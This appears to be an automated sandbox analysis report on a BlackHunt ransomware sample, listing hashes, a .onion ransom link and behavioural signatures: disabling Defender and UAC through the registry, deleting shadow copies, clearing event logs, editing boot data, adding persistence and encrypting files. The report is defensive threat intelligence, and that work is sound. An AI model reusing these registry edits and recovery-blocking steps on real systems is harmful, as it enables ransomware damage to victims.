Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 00:55
Static task
static1
Behavioral task
behavioral1
Sample
cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe
Resource
win10v2004-20231215-en
General
-
Target
cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe
-
Size
707KB
-
MD5
b923469fdcdbdb6377fd98422a4dd5a0
-
SHA1
5fbf0392d5ff94beb2816f818f7f86abe1873d35
-
SHA256
cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c
-
SHA512
875f936b9324933506bc3adf588c093bf15bc914627c6694da4a485b63c733ddb0a4edd19db9ea0c113c0c88c111b183716a33a072422d355ff28478094c6f78
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1F8kvnh:6uaTmkZJ+naie5OTamgEoKxLWwah
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1312 fsutil.exe 888 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2028 wevtutil.exe 3588 wevtutil.exe 1120 wevtutil.exe 3404 wevtutil.exe 2172 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 1592 bcdedit.exe 1812 bcdedit.exe 2728 bcdedit.exe 2720 bcdedit.exe -
Renames multiple (2914) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2636 wbadmin.exe 2080 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 1732 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened (read-only) \??\T: cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened (read-only) \??\G: cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened (read-only) \??\F: conhost.exe File opened (read-only) \??\U: cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened (read-only) \??\P: cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened (read-only) \??\N: cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened (read-only) \??\I: cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened (read-only) \??\H: cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened (read-only) \??\Q: cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened (read-only) \??\A: cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened (read-only) \??\L: cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened (read-only) \??\B: cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\Y: cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened (read-only) \??\O: cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened (read-only) \??\J: cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened (read-only) \??\X: cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened (read-only) \??\M: cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\R: cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened (read-only) \??\S: cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened (read-only) \??\K: cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened (read-only) \??\Z: cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened (read-only) \??\V: cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Accra cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Uzhgorod cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\#BlackHunt_Private.key cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\epl-v10.html cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_ja_4.4.0.v20140623020002.jar cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jre7\lib\alt-rt.jar cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\#BlackHunt_ReadMe.txt cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Center cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#BlackHunt_Private.key cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\acro20.lng cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\7-Zip\Lang\ar.txt cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationLeft_SelectionSubpicture.png cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\#BlackHunt_ReadMe.txt cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\#BlackHunt_Private.key cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#BlackHunt_ReadMe.txt cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File created C:\Program Files\VideoLAN\VLC\plugins\text_renderer\#BlackHunt_ReadMe.hta cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\7-Zip\Lang\tk.txt cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Makassar cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.nl_ja_4.4.0.v20140623020002.jar cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\#BlackHunt_ReadMe.txt cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\#BlackHunt_ReadMe.txt cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Jujuy cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Wallis cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\7-Zip\Lang\ast.txt cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_TW.properties cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\#BlackHunt_ReadMe.txt cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.console_1.1.0.v20140131-1639.jar cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_ja.jar cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-progress-ui.jar cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\7-Zip\Lang\ga.txt cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+10 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#BlackHunt_Private.key cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Amsterdam cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dumpmeta.luac cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File created C:\Program Files\VideoLAN\VLC\plugins\packetizer\#BlackHunt_Private.key cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\#BlackHunt_ReadMe.hta cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\meta-index cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javaws.policy cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net_1.2.200.v20140124-2013.jar cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director_2.3.100.v20140224-1921.jar cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jmx.xml cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\vlc.mo cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\#BlackHunt_Private.key cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\#BlackHunt_ReadMe.txt cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_ja.jar cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#BlackHunt_Private.key cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File created C:\Program Files\VideoLAN\VLC\locale\si\#BlackHunt_ReadMe.hta cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File created C:\Program Files\VideoLAN\VLC\plugins\d3d9\#BlackHunt_ReadMe.txt cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\7-Zip\Lang\pl.txt cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File created C:\Program Files\Java\jre7\lib\zi\America\Kentucky\#BlackHunt_ReadMe.hta cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Novokuznetsk cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Esl\#BlackHunt_ReadMe.hta cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\#BlackHunt_Private.key cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\ij cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Madeira cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\7-Zip\Lang\fi.txt cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Tripoli cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dushanbe cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Belgrade cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_ja_4.4.0.v20140623020002.jar cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File created C:\Program Files\Java\jre7\lib\#BlackHunt_Private.key cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.util_1.0.500.v20130404-1337.jar cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1600 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2772 vssadmin.exe 2720 vssadmin.exe 1160 vssadmin.exe 3540 vssadmin.exe 3632 vssadmin.exe 2948 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 3732 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1156 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1448 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe Token: SeRestorePrivilege 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe Token: SeBackupPrivilege 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe Token: SeTakeOwnershipPrivilege 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe Token: SeAuditPrivilege 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe Token: SeSecurityPrivilege 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe Token: SeIncBasePriorityPrivilege 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe Token: SeBackupPrivilege 2316 wbengine.exe Token: SeRestorePrivilege 2316 wbengine.exe Token: SeSecurityPrivilege 2316 wbengine.exe Token: SeBackupPrivilege 3304 vssvc.exe Token: SeRestorePrivilege 3304 vssvc.exe Token: SeAuditPrivilege 3304 vssvc.exe Token: SeSecurityPrivilege 2028 wevtutil.exe Token: SeBackupPrivilege 2028 wevtutil.exe Token: SeSecurityPrivilege 3588 wevtutil.exe Token: SeBackupPrivilege 3588 wevtutil.exe Token: SeSecurityPrivilege 1120 wevtutil.exe Token: SeBackupPrivilege 1120 wevtutil.exe Token: SeSecurityPrivilege 3404 wevtutil.exe Token: SeBackupPrivilege 3404 wevtutil.exe Token: SeDebugPrivilege 3732 taskkill.exe Token: SeSecurityPrivilege 2172 wevtutil.exe Token: SeBackupPrivilege 2172 wevtutil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1948 wrote to memory of 2304 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 29 PID 1948 wrote to memory of 2304 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 29 PID 1948 wrote to memory of 2304 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 29 PID 1948 wrote to memory of 2304 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 29 PID 1948 wrote to memory of 2756 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 92 PID 1948 wrote to memory of 2756 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 92 PID 1948 wrote to memory of 2756 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 92 PID 1948 wrote to memory of 2756 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 92 PID 1948 wrote to memory of 2824 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 126 PID 1948 wrote to memory of 2824 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 126 PID 1948 wrote to memory of 2824 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 126 PID 1948 wrote to memory of 2824 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 126 PID 1948 wrote to memory of 2812 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 85 PID 1948 wrote to memory of 2812 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 85 PID 1948 wrote to memory of 2812 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 85 PID 1948 wrote to memory of 2812 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 85 PID 2304 wrote to memory of 2832 2304 cmd.exe 87 PID 2304 wrote to memory of 2832 2304 cmd.exe 87 PID 2304 wrote to memory of 2832 2304 cmd.exe 87 PID 1948 wrote to memory of 1332 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 84 PID 1948 wrote to memory of 1332 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 84 PID 1948 wrote to memory of 1332 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 84 PID 1948 wrote to memory of 1332 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 84 PID 1948 wrote to memory of 2740 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 83 PID 1948 wrote to memory of 2740 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 83 PID 1948 wrote to memory of 2740 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 83 PID 1948 wrote to memory of 2740 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 83 PID 2756 wrote to memory of 2616 2756 cmd.exe 82 PID 2756 wrote to memory of 2616 2756 cmd.exe 82 PID 2756 wrote to memory of 2616 2756 cmd.exe 82 PID 1948 wrote to memory of 2920 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 81 PID 1948 wrote to memory of 2920 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 81 PID 1948 wrote to memory of 2920 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 81 PID 1948 wrote to memory of 2920 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 81 PID 1948 wrote to memory of 3024 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 80 PID 1948 wrote to memory of 3024 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 80 PID 1948 wrote to memory of 3024 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 80 PID 1948 wrote to memory of 3024 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 80 PID 1948 wrote to memory of 2996 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 75 PID 1948 wrote to memory of 2996 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 75 PID 1948 wrote to memory of 2996 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 75 PID 1948 wrote to memory of 2996 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 75 PID 1948 wrote to memory of 2780 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 71 PID 1948 wrote to memory of 2780 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 71 PID 1948 wrote to memory of 2780 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 71 PID 1948 wrote to memory of 2780 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 71 PID 2812 wrote to memory of 2652 2812 cmd.exe 70 PID 2812 wrote to memory of 2652 2812 cmd.exe 70 PID 2812 wrote to memory of 2652 2812 cmd.exe 70 PID 1948 wrote to memory of 2804 1948 